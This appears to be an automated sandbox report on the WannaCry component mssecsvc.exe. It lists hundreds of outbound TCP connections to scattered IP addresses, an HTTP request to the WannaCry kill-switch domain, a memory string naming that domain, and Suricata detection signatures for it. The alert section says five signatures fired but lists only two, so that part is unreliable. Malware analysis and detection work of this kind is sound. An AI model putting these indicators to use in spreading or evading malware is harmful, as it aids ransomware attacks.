mssecsvc.exe PID: 2368 Flag of United States United States 90.136.219.253 64657 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 66.107.128.124 64658 TCP mssecsvc.exe PID: 2368 Flag of United States United States 47.44.24.211 64659 TCP mssecsvc.exe PID: 2368 Flag of United States United States 174.237.193.27 64660 TCP mssecsvc.exe PID: 2368 Flag of United States United States 86.109.146.33 64661 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 214.124.208.244 64662 TCP mssecsvc.exe PID: 2368 Flag of United States United States 194.233.71.107 64663 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 71.195.253.44 64664 TCP 
mssecsvc.exe PID: 2368 Flag of United States United States 118.170.192.172 64665 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 99.226.225.89 64666 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 190.247.144.182 64667 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 31.63.90.168 64668 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 206.31.64.174 64669 TCP mssecsvc.exe PID: 2368 Flag of United States United States 103.250.143.223 64670 TCP mssecsvc.exe PID: 2368 Flag of Singapore Singapore 17.101.179.145 64671 TCP mssecsvc.exe PID: 2368 Flag of United States United States 142.223.14.24 64672 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 52.105.186.121 64673 TCP mssecsvc.exe PID: 2368 Flag of United States United States 116.246.94.76 64674 TCP mssecsvc.exe PID: 2368 Flag of China China 37.227.109.254 64675 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 212.10.7.79 64676 TCP mssecsvc.exe PID: 2368 Flag of Denmark Denmark 95.219.120.141 64677 TCP mssecsvc.exe PID: 2368 Flag of Saudi Arabia Saudi Arabia 57.109.43.208 64678 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 115.127.127.56 64679 TCP mssecsvc.exe PID: 2368 Flag of Bangladesh Bangladesh 129.218.245.226 64680 TCP mssecsvc.exe PID: 2368 Flag of United States United States 57.173.98.179 64681 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 162.62.66.18 64682 TCP mssecsvc.exe PID: 2368 Flag of China China 48.188.251.130 64683 TCP mssecsvc.exe PID: 2368 Flag of United States United States 112.115.189.139 64684 TCP mssecsvc.exe PID: 2368 Flag of China China 135.24.247.46 64685 TCP mssecsvc.exe PID: 2368 Flag of United States United States 48.123.251.139 64686 TCP mssecsvc.exe PID: 2368 Flag of United States United States 30.161.72.129 64687 TCP mssecsvc.exe PID: 2368 Flag of United States United States 199.182.177.89 64688 TCP mssecsvc.exe PID: 2368 Flag of United States United States 153.120.205.137 64689 TCP mssecsvc.exe PID: 2368 Flag of Japan 
Japan 74.242.187.129 64690 TCP mssecsvc.exe PID: 2368 Flag of United States United States 97.155.12.201 64691 TCP mssecsvc.exe PID: 2368 Flag of United States United States 45.94.98.234 64692 TCP mssecsvc.exe PID: 2368 Flag of United States United States 31.29.143.10 64693 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 41.217.253.242 64694 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 12.120.201.150 64695 TCP mssecsvc.exe PID: 2368 Flag of United States United States 6.102.199.202 64696 TCP mssecsvc.exe PID: 2368 Flag of United States United States 86.105.223.107 64697 TCP mssecsvc.exe PID: 2368 Flag of Romania Romania 6.252.74.41 64698 TCP mssecsvc.exe PID: 2368 Flag of United States United States 16.207.231.126 64699 TCP mssecsvc.exe PID: 2368 Flag of United States United States 137.232.133.248 64700 TCP mssecsvc.exe PID: 2368 Flag of United States United States 125.110.106.159 64701 TCP mssecsvc.exe PID: 2368 Flag of China China 89.31.141.22 64702 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 132.200.216.1 64703 TCP mssecsvc.exe PID: 2368 Flag of United States United States 33.74.214.213 64704 TCP mssecsvc.exe PID: 2368 Flag of United States United States 97.102.246.74 64706 TCP mssecsvc.exe PID: 2368 Flag of United States United States 221.109.4.245 64707 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 144.204.113.62 64708 TCP mssecsvc.exe PID: 2368 Flag of France France 181.4.31.27 64709 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 114.82.124.50 64710 TCP mssecsvc.exe PID: 2368 Flag of China China 123.87.93.67 64711 TCP mssecsvc.exe PID: 2368 Flag of China China 149.203.241.17 64712 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 166.158.57.227 64713 TCP mssecsvc.exe PID: 2368 Flag of United States United States 13.211.209.127 64714 TCP mssecsvc.exe PID: 2368 Flag of United States United States 45.119.115.200 64715 TCP mssecsvc.exe PID: 2368 Flag of India India 115.48.24.245 64716 TCP mssecsvc.exe PID: 
2368 Flag of China China 137.152.198.106 64717 TCP mssecsvc.exe PID: 2368 Flag of United States United States 205.231.230.193 64718 TCP mssecsvc.exe PID: 2368 Flag of United States United States 179.7.157.240 64719 TCP mssecsvc.exe PID: 2368 Flag of Peru Peru 8.187.166.153 64720 TCP mssecsvc.exe PID: 2368 Flag of United States United States 13.45.218.203 64721 TCP mssecsvc.exe PID: 2368 Flag of United States United States 23.22.125.120 64722 TCP mssecsvc.exe PID: 2368 Flag of United States United States 137.134.15.150 64723 TCP mssecsvc.exe PID: 2368 Flag of United States United States 144.34.130.222 64724 TCP mssecsvc.exe PID: 2368 Flag of United States United States 83.253.41.50 64725 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 134.51.24.73 64726 TCP mssecsvc.exe PID: 2368 Flag of United States United States 41.13.78.31 64727 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 85.161.12.156 64728 TCP mssecsvc.exe PID: 2368 Flag of Czech Republic Czech Republic 166.108.185.188 64729 TCP mssecsvc.exe PID: 2368 Flag of United States United States 163.71.175.200 64730 TCP mssecsvc.exe PID: 2368 Flag of France France 143.230.162.88 64731 TCP mssecsvc.exe PID: 2368 Flag of United States United States 59.240.75.49 64732 TCP mssecsvc.exe PID: 2368 Flag of China China 114.165.249.94 64733 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 215.186.47.129 64734 TCP mssecsvc.exe PID: 2368 Flag of United States United States 141.187.97.133 64735 TCP mssecsvc.exe PID: 2368 Flag of United States United States 72.75.194.37 64736 TCP mssecsvc.exe PID: 2368 Flag of United States United States 162.175.46.20 64737 TCP mssecsvc.exe PID: 2368 Flag of United States United States 108.82.87.205 64738 TCP mssecsvc.exe PID: 2368 Flag of United States United States 27.243.183.109 64739 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 37.20.166.233 64740 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 
116.20.123.180 64741 TCP mssecsvc.exe PID: 2368 Flag of China China 58.214.247.28 64742 TCP mssecsvc.exe PID: 2368 Flag of China China 119.239.163.144 64743 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 61.181.130.87 64744 TCP mssecsvc.exe PID: 2368 Flag of China China 88.88.206.171 64745 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 138.24.3.232 64746 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 97.48.210.237 64747 TCP mssecsvc.exe PID: 2368 Flag of United States United States 136.91.202.110 64748 TCP mssecsvc.exe PID: 2368 Flag of United States United States 133.249.176.64 64749 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 33.199.158.2 64750 TCP mssecsvc.exe PID: 2368 Flag of United States United States 9.178.26.207 64751 TCP mssecsvc.exe PID: 2368 Flag of United States United States 206.33.206.126 64752 TCP mssecsvc.exe PID: 2368 Flag of United States United States 94.111.192.14 64753 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 48.188.213.34 64754 TCP mssecsvc.exe PID: 2368 Flag of United States United States 98.226.230.6 64755 TCP mssecsvc.exe PID: 2368 Flag of United States United States 126.95.99.245 64756 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 81.82.200.51 64757 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 77.65.32.153 64758 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 8.177.160.185 64759 TCP mssecsvc.exe PID: 2368 Flag of United States United States 140.217.182.223 64760 TCP mssecsvc.exe PID: 2368 Flag of United States United States 11.218.142.180 64761 TCP mssecsvc.exe PID: 2368 Flag of United States United States 115.4.165.112 64762 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 5.136.26.211 64763 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 88.219.132.205 64764 TCP mssecsvc.exe PID: 2368 Flag of France France 101.12.62.74 64765 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 61.118.134.212 64766 TCP mssecsvc.exe 
PID: 2368 Flag of Japan Japan 73.111.184.254 64767 TCP mssecsvc.exe PID: 2368 Flag of United States United States 207.136.29.181 64768 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 195.104.53.122 64769 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 200.161.195.104 64770 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 71.198.148.146 64771 TCP mssecsvc.exe PID: 2368 Flag of United States United States 107.129.134.49 64772 TCP mssecsvc.exe PID: 2368 Flag of United States United States 163.15.26.215 64773 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 43.56.218.31 64774 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 218.170.0.45 64775 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 78.108.113.91 64776 TCP mssecsvc.exe PID: 2368 Flag of European Union European Union 126.59.178.162 64777 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 123.79.246.188 64778 TCP mssecsvc.exe PID: 2368 Flag of China China 44.74.242.7 64779 TCP mssecsvc.exe PID: 2368 Flag of United States United States 64.87.154.152 64780 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 42.197.163.232 64781 TCP mssecsvc.exe PID: 2368 Flag of China China 173.204.141.49 64782 TCP mssecsvc.exe PID: 2368 Flag of United States United States 17.27.115.102 64783 TCP mssecsvc.exe PID: 2368 Flag of United States United States 102.181.226.39 64784 TCP mssecsvc.exe PID: 2368 Flag of Cote D'ivoire Cote D'ivoire 178.187.160.217 64785 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 124.105.49.86 64786 TCP mssecsvc.exe PID: 2368 Flag of Philippines Philippines 93.117.102.96 64787 TCP mssecsvc.exe PID: 2368 Flag of Iran (ISLAMIC Republic Of) Iran (ISLAMIC Republic Of) 17.216.228.243 64788 TCP mssecsvc.exe PID: 2368 Flag of United States United States 208.143.190.248 64789 TCP mssecsvc.exe PID: 2368 Flag of United States United States 207.82.183.82 64790 TCP mssecsvc.exe 
PID: 2368 Flag of United States United States 198.124.20.73 64791 TCP mssecsvc.exe PID: 2368 Flag of United States United States 74.197.85.210 64792 TCP mssecsvc.exe PID: 2368 Flag of United States United States 182.204.76.89 64793 TCP mssecsvc.exe PID: 2368 Flag of China China 22.253.253.38 64794 TCP mssecsvc.exe PID: 2368 Flag of United States United States 196.105.53.121 64795 TCP mssecsvc.exe PID: 2368 Flag of Kenya Kenya 222.158.96.119 64796 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 133.142.74.54 64797 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 125.88.194.169 64798 TCP mssecsvc.exe PID: 2368 Flag of China China 193.229.239.90 64799 TCP mssecsvc.exe PID: 2368 Flag of Finland Finland 2.212.202.9 64800 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 123.102.42.34 64801 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 87.71.159.84 64802 TCP mssecsvc.exe PID: 2368 Flag of Israel Israel 177.251.53.51 64803 TCP mssecsvc.exe PID: 2368 Flag of Paraguay Paraguay 6.226.197.84 64804 TCP mssecsvc.exe PID: 2368 Flag of United States United States 31.212.205.44 64805 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 17.73.168.56 64806 TCP mssecsvc.exe PID: 2368 Flag of United States United States 114.49.193.42 64807 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 59.58.189.227 64808 TCP mssecsvc.exe PID: 2368 Flag of China China 38.116.26.147 64809 TCP mssecsvc.exe PID: 2368 Flag of United States United States 144.244.185.162 64810 TCP mssecsvc.exe PID: 2368 Flag of United States United States 82.11.16.127 64811 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 196.21.31.82 64812 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 80.150.51.95 64813 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 143.51.232.64 64814 TCP mssecsvc.exe PID: 2368 Flag of Finland Finland 93.133.219.92 64815 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 147.62.91.93 64816 TCP mssecsvc.exe PID: 2368 Flag of United States United States 104.220.88.26 
64817 TCP mssecsvc.exe PID: 2368 Flag of United States United States 40.38.134.62 64818 TCP mssecsvc.exe PID: 2368 Flag of United States United States 107.100.112.184 64819 TCP mssecsvc.exe PID: 2368 Flag of United States United States 206.131.65.143 64820 TCP mssecsvc.exe PID: 2368 Flag of United States United States 105.249.107.84 64821 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 164.77.19.55 64822 TCP mssecsvc.exe PID: 2368 Flag of Chile Chile 60.43.220.58 64823 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 147.213.64.14 64824 TCP mssecsvc.exe PID: 2368 Flag of Slovakia (SLOVAK Republic) Slovakia (SLOVAK Republic) 61.155.83.237 64825 TCP mssecsvc.exe PID: 2368 Flag of China China 161.145.180.205 64826 TCP mssecsvc.exe PID: 2368 Flag of United States United States 193.87.133.24 64827 TCP mssecsvc.exe PID: 2368 Flag of Slovakia (SLOVAK Republic) Slovakia (SLOVAK Republic) 204.56.106.219 64828 TCP mssecsvc.exe PID: 2368 Flag of United States United States 181.244.159.191 64829 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 166.208.122.83 64830 TCP mssecsvc.exe PID: 2368 Flag of United States United States 48.48.237.142 64831 TCP mssecsvc.exe PID: 2368 Flag of United States United States 18.11.220.238 64832 TCP mssecsvc.exe PID: 2368 Flag of United States United States 7.47.181.172 64833 TCP mssecsvc.exe PID: 2368 Flag of United States United States 29.96.65.252 64834 TCP mssecsvc.exe PID: 2368 Flag of United States United States 112.166.198.215 64835 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 221.124.222.22 64836 TCP mssecsvc.exe PID: 2368 Flag of Hong Kong Hong Kong 177.183.91.115 64837 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 152.15.5.53 64838 TCP mssecsvc.exe PID: 2368 Flag of United States United States 151.101.7.233 64839 TCP mssecsvc.exe PID: 2368 Flag of United States United States 115.30.67.99 64840 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 
13.11.242.240 64841 TCP mssecsvc.exe PID: 2368 Flag of United States United States 34.23.215.51 64842 TCP mssecsvc.exe PID: 2368 Flag of United States United States 159.233.165.30 64843 TCP mssecsvc.exe PID: 2368 Flag of United States United States 13.37.98.101 64844 TCP mssecsvc.exe PID: 2368 Flag of United States United States 30.131.28.77 64845 TCP mssecsvc.exe PID: 2368 Flag of United States United States 39.68.38.48 64846 TCP mssecsvc.exe PID: 2368 Flag of China China 196.81.193.184 64847 TCP mssecsvc.exe PID: 2368 Flag of Morocco Morocco 209.216.208.23 64848 TCP mssecsvc.exe PID: 2368 Flag of United States United States 101.186.131.65 64849 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 140.85.217.49 64851 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 23.62.18.61 64852 TCP mssecsvc.exe PID: 2368 Flag of United States United States 102.222.103.172 64853 TCP mssecsvc.exe PID: 2368 Flag of Egypt Egypt 117.249.3.106 64854 TCP mssecsvc.exe PID: 2368 Flag of India India 184.122.166.147 64855 TCP mssecsvc.exe PID: 2368 Flag of United States United States 135.189.3.5 64856 TCP mssecsvc.exe PID: 2368 Flag of United States United States 7.11.213.2 64857 TCP mssecsvc.exe PID: 2368 Flag of United States United States 29.89.139.3 64858 TCP mssecsvc.exe PID: 2368 Flag of United States United States 150.190.72.189 64859 TCP mssecsvc.exe PID: 2368 Flag of United States United States 22.253.62.247 64860 TCP mssecsvc.exe PID: 2368 Flag of United States United States 189.95.46.12 64861 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 4.166.133.20 64862 TCP mssecsvc.exe PID: 2368 Flag of United States United States 146.13.12.228 64863 TCP mssecsvc.exe PID: 2368 Flag of United States United States 52.22.3.95 64864 TCP mssecsvc.exe PID: 2368 Flag of United States United States 194.235.199.18 64865 TCP mssecsvc.exe PID: 2368 Flag of European Union European Union 155.97.237.58 64866 TCP mssecsvc.exe PID: 2368 Flag of United States United States 83.169.213.143 64867 TCP 
mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 125.38.103.57 64868 TCP mssecsvc.exe PID: 2368 Flag of China China 2.153.141.92 64869 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 190.32.65.141 64870 TCP mssecsvc.exe PID: 2368 Flag of Panama Panama 102.148.59.221 64871 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 181.150.211.68 64872 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 217.16.240.205 64873 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 171.142.40.43 64874 TCP mssecsvc.exe PID: 2368 Flag of United States United States 184.59.123.30 64875 TCP mssecsvc.exe PID: 2368 Flag of United States United States 139.181.161.156 64876 TCP mssecsvc.exe PID: 2368 Flag of United States United States 103.88.102.105 64877 TCP mssecsvc.exe PID: 2368 Flag of China China 96.63.23.215 64878 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 79.175.229.128 64879 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 21.212.85.143 64880 TCP mssecsvc.exe PID: 2368 Flag of United States United States 212.236.112.169 64881 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 170.62.201.74 64882 TCP mssecsvc.exe PID: 2368 Flag of United States United States 215.103.34.198 64883 TCP mssecsvc.exe PID: 2368 Flag of United States United States 96.102.98.169 64884 TCP mssecsvc.exe PID: 2368 Flag of United States United States 67.244.148.223 64885 TCP mssecsvc.exe PID: 2368 Flag of United States United States 125.227.34.248 64886 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 208.171.176.32 64887 TCP mssecsvc.exe PID: 2368 Flag of United States United States 23.186.211.242 64888 TCP mssecsvc.exe PID: 2368 Flag of Reserved Reserved 121.54.46.147 64889 TCP mssecsvc.exe PID: 2368 Flag of Philippines Philippines 210.127.197.74 64890 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 129.19.129.190 64891 TCP mssecsvc.exe PID: 2368 Flag of United States United States 94.53.64.239 64892 TCP 
mssecsvc.exe PID: 2368 Flag of Romania Romania 9.95.46.151 64893 TCP mssecsvc.exe PID: 2368 Flag of United States United States 222.1.44.244 64894 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 79.39.234.51 64895 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 75.246.112.154 64896 TCP mssecsvc.exe PID: 2368 Flag of United States United States 156.94.151.39 64897 TCP mssecsvc.exe PID: 2368 Flag of United States United States 116.182.203.152 64898 TCP mssecsvc.exe PID: 2368 Flag of China China 183.95.37.29 64899 TCP mssecsvc.exe PID: 2368 Flag of China China 212.52.236.56 64900 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 131.152.3.222 64901 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 117.132.80.49 64902 TCP mssecsvc.exe PID: 2368 Flag of China China 48.144.242.184 64903 TCP mssecsvc.exe PID: 2368 Flag of United States United States 169.164.114.162 64904 TCP mssecsvc.exe PID: 2368 Flag of United States United States 114.79.39.140 64905 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 90.32.91.134 64906 TCP mssecsvc.exe PID: 2368 Flag of France France 71.26.110.81 64907 TCP mssecsvc.exe PID: 2368 Flag of United States United States 97.214.250.21 64908 TCP mssecsvc.exe PID: 2368 Flag of United States United States 189.121.228.51 64909 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 80.150.214.53 64910 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 185.10.103.173 64911 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 5.145.129.52 64912 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 174.13.247.237 64913 TCP mssecsvc.exe PID: 2368 Flag of United States United States 100.76.237.218 64914 TCP mssecsvc.exe PID: 2368 Flag of Reserved Reserved 14.52.109.132 64915 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 203.234.43.199 64916 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 20.244.97.251 64917 TCP mssecsvc.exe PID: 2368 Flag of United States United States 130.113.76.62 64918 
Contacted Hosts (continued). Every row below is a TCP connection made by mssecsvc.exe (PID 2368); the Port column is reproduced exactly as the report shows it, and the country is the flag displayed next to each address.

IP               Port   Country
(on preceding line)     Canada
180.68.219.14    64919  Korea, Republic of
135.189.234.238  64920  United States
84.141.186.180   64921  Germany
79.122.219.169   64922  Russian Federation
139.154.49.175   64923  Japan
81.22.252.252    64924  Finland
116.6.212.171    64925  China
107.26.154.143   64926  United States
192.35.246.214   64927  Portugal
198.36.110.88    64928  United States
104.14.168.124   64929  United States
137.17.40.232    64930  Netherlands
169.124.229.130  64931  United States
70.39.228.250    64932  United States
212.82.24.169    64933  United Kingdom
120.191.161.183  64934  Indonesia
39.113.66.95     64935  Korea, Republic of
170.206.117.64   64936  United States
208.153.28.23    64937  United States
154.252.96.71    64938  Algeria
209.75.237.50    64939  United States
171.163.167.55   64940  United States
111.43.171.152   64941  China
102.128.165.103  64942  Indonesia
130.168.210.226  64943  United States
83.70.134.165    64944  Ireland
14.236.131.203   64945  Viet Nam
43.80.128.110    64946  Japan
4.220.36.150     64947  United States
58.14.131.168    64948  China
80.97.247.142    64949  Romania
222.154.229.48   64950  New Zealand
129.151.217.76   64951  United States
90.212.84.170    64952  United Kingdom
161.186.146.157  64953  United States
209.111.16.227   64954  United States
173.138.34.224   64955  United States
113.186.9.131    64956  Viet Nam
49.228.203.210   64957  Thailand
142.132.132.185  64958  Canada
208.1.70.61      64959  United States
1.198.218.249    64960  China
174.113.194.247  64961  Canada
177.101.138.235  64962  Brazil
103.206.52.46    64963  India
12.140.103.252   64964  United States
185.150.53.205   64965  Switzerland
74.179.222.93    64967  United States
65.99.138.107    64968  Sweden
157.28.42.166    64969  Italy
216.24.88.54     64970  United States
115.225.14.147   64971  China
73.171.206.38    64972  United States
39.59.227.59     64973  Pakistan
164.167.160.116  64974  United States
42.234.131.217   64975  China
124.232.129.215  64976  China
76.91.77.224     64977  United States
106.98.127.94    64978  Korea, Republic of
167.228.253.33   64979  United States
93.11.64.38      64980  France
14.101.10.191    64981  Japan
44.68.75.13      64982  United States
189.68.254.100   64983  Brazil
135.93.171.141   64984  United States
164.203.13.37    64985  United States
166.75.115.86    64986  Chile
26.110.139.217   64988  United States
136.52.134.39    64989  United States
190.175.174.52   64990  Argentina
211.7.134.112    64991  Japan
152.187.117.31   64992  United States
70.145.194.161   64993  United States
112.254.32.152   64994  China
181.208.221.10   64995  Venezuela
39.213.130.196   64996  Indonesia
122.37.43.252    64997  Korea, Republic of
60.195.54.163    64998  China
9.187.106.209    64999  United States
115.64.54.62     65000  Australia
167.66.46.87     65001  United States
157.13.217.104   65002  Japan
222.58.226.131   65003  China
100.35.120.196   65004  United States
110.147.110.221  65005  Australia
18.45.138.253    65006  United States
102.145.187.100  65007  Indonesia
98.182.152.89    65008  United States
180.232.42.129   65009  Philippines
222.26.192.183   65010  China
120.190.106.48   65012  Indonesia
220.79.187.165   65013  Korea, Republic of
77.149.69.4      65014  France
132.20.157.62    65015  United States
139.221.204.84   65016  China
36.51.89.67      65017  China
18.222.69.93     65018  United States
200.46.127.103   65019  Panama
74.37.198.221    65020  United States
217.178.243.152  65021  Japan
15.61.173.16     65022  United States
68.89.251.234    65023  United States
156.246.76.116   65024  Seychelles
183.150.215.29   65025  China
157.111.109.177  65026  Japan
123.226.212.201  65027  Japan
126.188.156.170  65028  Japan
115.43.174.21    65029  Taiwan
2.199.154.61     65030  Italy
106.205.94.71    65031  India
218.224.148.162  65032  Japan
219.46.124.5     65033  Japan
194.113.145.76   65034  Germany
186.8.170.189    65035  Uruguay
93.207.74.104    65036  Germany
122.224.3.79     65037  China
142.199.151.115  65038  Canada
178.191.141.239  65039  Austria
119.4.180.7      65040  China
93.32.21.187     65041  Italy
49.85.149.221    65042  China
200.195.83.133   65043  Brazil
53.5.149.253     65044  Germany
12.232.48.37     65045  United States
49.241.133.21    65046  Japan
196.127.68.211   65047  Morocco
193.167.91.231   65048  Finland
33.98.208.81     65049  United States
176.66.206.173   65050  Austria
91.171.204.38    65051  France
221.234.119.126  65052  China
155.172.48.32    65053  United States
72.75.11.30      65054  United States
198.234.167.132  65055  United States
80.123.254.101   65056  Austria
57.101.47.76     65057  Belgium
212.251.158.39   65058  Norway
32.178.188.49    65059  United States
9.29.188.210     65060  United States
187.173.164.185  65061  Mexico
109.251.75.95    65062  Ukraine
149.173.32.188   65063  United States
209.170.84.209   65064  United States
186.127.206.156  65065  Argentina
152.135.144.130  65066  United States
137.201.35.40    65067  United States
97.234.103.65    65068  United States
62.35.222.91     65069  France
171.165.1.199    65070  United States
191.159.97.186   65071  Colombia
199.73.168.73    65072  United States
22.22.71.241     65073  United States
72.228.118.32    65074  United States
115.220.254.113  65075  China
107.204.78.167   65076  United States
129.12.30.240    65077  United Kingdom
46.2.173.154     65078  Turkey
96.101.225.79    65079  United States
7.121.147.230    65080  United States
178.229.251.222  65081  Netherlands
217.107.107.202  65082  Russian Federation
121.21.178.112   65083  China
207.238.35.217   65084  United States
164.27.219.251   65085  Germany
53.79.118.69     65086  Germany
166.82.119.100   65087  United States
197.214.135.121  65088  Congo
61.183.179.13    65089  China
64.160.223.167   65090  United States
216.31.178.239   65091  United States
147.90.147.19    65092  United States
196.125.204.64   65093  Morocco
220.178.72.209   65094  China
157.48.218.235   65095  India
86.232.2.4       65096  France
65.166.244.23    65097  United States
136.32.150.70    65098  United States
202.125.153.71   65099  Pakistan
160.121.226.117  65100  South Africa
179.2.176.172    65101  Chile
198.79.155.117   65102  United States
83.141.162.60    65103  France
145.249.89.123   65104  Russian Federation
17.27.144.17     65105  United States
92.75.68.113     65106  Germany
211.139.73.134   65107  China
218.237.9.192    65108  Korea, Republic of
173.84.41.226    65109  United States
78.49.209.238    65110  Germany
109.168.205.33   65111  Russian Federation
29.104.160.181   65112  United States
157.88.79.203    65113  Spain
47.221.226.226   65114  United States
82.146.186.93    65115  Lebanon
110.43.105.184   65116  China
5.83.63.34       65117  Finland
65.224.238.226   65118  United States
117.108.31.229   65119  Japan
48.27.195.139    65120  United States
17.97.142.121    65121  United States
139.36.73.99     65122  United States
146.30.137.158   65123  United States
178.212.126.72   65124  Poland
152.233.222.200  65125  Brazil
84.35.4.161      65126  Netherlands
171.83.237.17    65128  China
91.131.162.202   65129  Austria
96.27.182.195    65130  United States
53.51.166.14     65131  Germany
97.220.239.156   65132  United States
34.220.222.144   65133  United States
143.78.228.87    65134  United States
34.109.76.122    65135  United States
174.223.36.28    65136  United States
72.209.125.50    65137  United States
81.114.233.62    65138  Italy
38.16.136.90     65139  United States
105.142.92.224   65140  Morocco
24.249.63.70     65141  United States
156.235.120.197  65142  Seychelles
48.87.238.178    65143  United States
206.218.122.189  65144  United States
59.182.49.188    65146  India
105.97.189.146   65147  Algeria
20.164.48.191    65148  United States
20.232.115.252   65149  United States
95.83.38.144     65150  Russian Federation
34.209.163.164   65151  United States
155.36.83.225    65152  United States
207.104.148.7    65153  United States
129.2.230.200    65154  United States
113.20.245.213   65155  Japan
66.98.145.23     65156  United States
131.36.59.104    65157  United States
145.150.44.144   65158  Netherlands
27.179.169.87    65159  Korea, Republic of
214.143.39.172   65161  United States
202.249.34.223   65162  Japan
15.61.92.34      65163  United States
203.254.209.132  65164  Korea, Republic of
220.90.94.205    65165  Korea, Republic of
90.116.65.202    65166  France
52.252.182.157   65167  United States
36.241.250.165   65168  Japan
161.253.8.214    65169  United States

Contacted Countries: (map, not reproduced; the countries are those listed in the table above)

HTTP Traffic
Endpoint: 104.17.40.137:80 (www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com)
Request:  GET /
Data:
  GET / HTTP/1.1
  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  Cache-Control: no-cache
Response: 200 OK
The report lists this request twice (two identical rows).

Memory Forensics
String:     http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Context:    Domain/IP reference
Stream UID: 00013504-00002368-57047-2-00408140

Suricata Alerts
Event for every alert: 104.17.40.137:80 (TCP); category for every alert: "A Network Trojan was detected". Each of the five signatures fired twice, once per request:
  ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1   SID 2024298
  ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 2   SID 2024299
